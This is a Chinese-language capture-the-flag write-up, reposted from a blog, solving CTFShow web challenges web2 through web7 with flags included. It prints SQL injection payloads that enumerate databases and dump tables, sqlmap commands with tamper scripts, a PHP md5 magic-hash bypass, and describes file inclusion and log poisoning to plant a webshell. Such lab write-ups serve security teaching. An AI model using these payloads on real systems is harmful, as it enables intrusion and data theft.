文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

CTFShow-Web篇详细wp(持续更新中ing)

2023-10-02 10:42

关注

CTFShow-Web篇详细wp

CTFShow 平台:https://ctf.show/

web签到题

直接F12然后Base64解码

在这里插入图片描述

ctfshow{19bdf375-f974-481e-8c62-0f4c3d170fb4}

web2

考点:联合查询

先尝试使用万能密码登入 ‘ or 1=1# 登入成功!!

在这里插入图片描述
在这里插入图片描述
’or 1=1 order by 3# 输入4没回显说明只有三个字段
在这里插入图片描述

在这里插入图片描述

' or 1=1 union select 1,database(),3#    爆破数据库为web2

' or 1=1 union select 1,(select table_name from information_schema.tables where table_schema='web2' limit 0,1),3 #  爆破表web2

在这里插入图片描述

' or 1=1 union select 1,(select column_name from information_schema.columns where table_name='flag' limit 0,1),3#   爆字段

在这里插入图片描述

' or 1=1 union select 1,(select flag from flag limit 0,1),3#  查询内容

ctfshow{3e0dc92c-052f-4740-98f5-2ecdf8614a84}

web3

考点:伪协议

在这里插入图片描述
测试一下存在文件包含漏洞抓个包 使用php://input 得到了ctf_go_go_go 直接读取即可。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

ctfshow{4dce862e-bd78-4ff2-b933-9798d391a276}

web4

考点:日志注入 文件包含

这里和上面一题差不多只是这么过滤了php://inpt 给的提示是日志注入 我们先来尝试一下:?url=/var/login/nginx/access.log 成功!

在这里插入图片描述
在这里插入图片描述

ok我们继续抓个包看看尝试传个木马能不能getshell 尝试蚁剑连接ok连接成功!!

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

ctfshow{4873a70e-7d9d-456d-8eef-4a5a541c0e37}

web5

考点:代码审计(md5绕过)

where is flag?<?phperror_reporting(0);    ?><html lang="zh-CN"><head>    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, initial-scale=1.0" />    <title>ctf.show_web5</title></head><body>    <center>    <h2>ctf.show_web5</h2>    <hr>    <h3>    </center>    <?php        $flag="";        $v1=$_GET['v1'];        $v2=$_GET['v2'];        if(isset($v1) && isset($v2)){            if(!ctype_alpha($v1)){                die("v1 error");            }            if(!is_numeric($v2)){                die("v2 error");            }            if(md5($v1)==md5($v2)){                echo $flag;            }        }else{                    echo "where is flag?";        }    ?></body></html>

ctype_alpha用来检测是否只含有字符,不是则为false
is_numeric用于检测是否是纯数字

这里输入v1,v2的值,v1为字符,v2为数字 然后让他们的md5的值相等即可输出flag
这里是一个弱类型比较在PHP中0e会被当做科学计数法 前两位相等即可完成绕过

开头为0E(MD5值) 字母数字混合类型:s878926199a0e545993274517709034328855841020s155964671a0e342768416822451524974117254469s214587387a0e848240448830537924465865611904s214587387a0e848240448830537924465865611904纯大写字母:QLTHNDT0e405967825401955372549139051580QNKCDZO0e830400451993494058024219903391EEIZDOI0e782601363539291779881938479162纯数字:2406107080e46209743190650901956298873685440116270630e48580568703443990593836270177547756350650e99821208994664096759945036116847905553610e64344221466099443013449246451254324535310e51231869908588163086189052609755796798200e87762201173022180346174018491555853935790e66435735538230580599276533702363765525010e16588670699748218787021557801571241299770e50000736104474780468212206087671975461970e91518857607246910145731567550276564861570e451569119711843337267091732412

Payload:?v1=EEIZDOI&v2=4011627063

在这里插入图片描述

ctfshow{0704b7e0-d2e9-461f-9967-e086e185402e}

web6

考点:SQL注入(空格绕过)
又是这个熟悉的框 老样子尝试万能密码 发现报错!
在这里插入图片描述
在这里插入图片描述
SQL绕过知识点(第一次做,这里使用 )

web2一样继续使用联合查询注入替换即可。

1'unionselect1,2,3#  查询位置 在第二个字段

在这里插入图片描述

1'unionselect1,database(),3#  爆破库 web2数据库

在这里插入图片描述

1'unionselect1,group_concat(table_name),3frominformation_schema.tableswheretable_schema=database()#  爆破表

在这里插入图片描述

1'unionselect1,group_concat(column_name),3frominformation_schema.columnswheretable_name='flag'#  爆字段

在这里插入图片描述

1'unionselect1,flag,3fromflag#  查看flag内容

在这里插入图片描述

ctfshow{3e29853a-156e-483e-86c5-480c2aea5ddc}

web7

考点:盲注&sqlmap的使用
在这里插入图片描述
在这里插入图片描述
这里随便点了一下发现存在id=1 存在注入点 这里盲注不会 直接使用工具吧(我是菜鸡,没办法)

Sqlmap基础:

Sqlmap进阶(脚本):

线程和nmapT4一样的sqlmap有5级,越高检测越全,默认为 1

🆗这里简单介绍了一下怎么使用 具体脚本大家可以自己百度搜一下 这里使用randomcomments模块 空格绕过

在这里插入图片描述

sqlmap -u "http://8b540425-2755-465b-a28d-d1ba3ca879bc.challenge.ctf.show/index.php?id=1" --tamper "space2comment" --batch --dbs  #列出库

在这里插入图片描述

sqlmap -u "http://8b540425-2755-465b-a28d-d1ba3ca879bc.challenge.ctf.show/index.php?id=1" --tamper "space2comment" --batch -D web7 --tables  #列出表

在这里插入图片描述

sqlmap -u "http://8b540425-2755-465b-a28d-d1ba3ca879bc.challenge.ctf.show/index.php?id=1" --tamper "space2comment" --batch -D web7 -T flag --columns  #列出字段

在这里插入图片描述

sqlmap -u "http://8b540425-2755-465b-a28d-d1ba3ca879bc.challenge.ctf.show/index.php?id=1" --tamper "space2comment" --batch -D web7 -T flag -C flag --dump#查询字段内容

在这里插入图片描述

ctfshow{f534b781-af47-4c46-9ece-3a905c11cd96}

web8

考点:布尔盲注
这里过滤了空格和逗号

来源地址:https://blog.csdn.net/Aluxian_/article/details/130318310

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯